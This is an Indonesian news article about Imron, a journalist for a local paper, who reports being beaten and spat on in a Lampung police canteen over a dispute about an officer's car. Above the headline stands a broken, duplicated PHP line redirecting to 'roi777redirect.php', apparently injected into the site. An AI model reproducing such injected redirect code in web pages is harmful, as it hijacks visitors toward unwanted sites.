header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Lagi-Lagi Wartawan Dianiaya -
Lagi-Lagi Wartawan Dianiaya

TRANSLAMPUNG.COM, PESAWARAN – Imron (42) Warga Desa Karang Anyar Kecamatan Gedongtataan Kabupaten Pesawaran yang merupakan salah satu wartawan surat Kabar Harian Bongkar Post melaporkan peristiwa penganiayaan terhadap dirinya di Polresta  Bandarlampung.

Menurut keterangan korban penganiayaan ini terjadi di kantin Direktorat Shabara Polda Lampung pada hari Senin(8/1) berawal saat dirinya bertemu dengan AN yang kabarnya merupakan warga Rajabasa Bandar Lampung di sebuah rumah makan di Pesawaran, tujuanya untuk menanyakan perihal kendaraan mobil milik salah satu perwira di Ditshabara Polda Lampung.

“Saya pertama kali diajak ketemuan oleh AN di Rumah makan Puti Minang, disana saya di desak AN untuk mengakui keberadaan mobil yang justru saya tidak tahu keberadaannya,”ungkapnya, usai melaporkan peristiwa tersebut di Polresta Bandar Lampung, Selasa (9/1)

Setelah itu, kata dia,dirinya dibawa menuju kantor Ditshabara Polda Lampung untuk menemui salah satu anggota perwira polisi yang kabarnya pemilik mobil tersebut.

“Habis dari rumah makan, saya dibawa ke kantin Ditshabara Polda Lampung, disana saya ditemukan dengan anggota polisi yang katanya pemilik mobil tersebut, di kantin itu saya dicakar dan dipukuli pada bagian kepala serta diludahi muka saya dihadapan aparat polisi, tapi tidak satupun yang menolong saya,” katanya.

“Habis dipukuli disana saya langsung dibawa pulang lagi,” timpalnya.

Merasa dirinya dirugikan, sambungnya, ia berinisiatif untuk langsung melaporkan peristiwa tersebut ke Mapolresta Bandar Lampung.

“Iya tadi saya sudah laporan ke polisi terkait peristiwa yang saya alami, dan saya juga sudah melakukan visum di RSUD Abdoel Moeloek,” sambungnya.

Dengan kejadian yang menimpa dirinya ini ia pun berharap agar peristiwa ini dapat ditangani polisi dengan serius.

“Harapan saya pelaku mendapatkan hukuman sesuai dengan peraturan yang berlaku,” pungkasnya (ydn).

News Reporter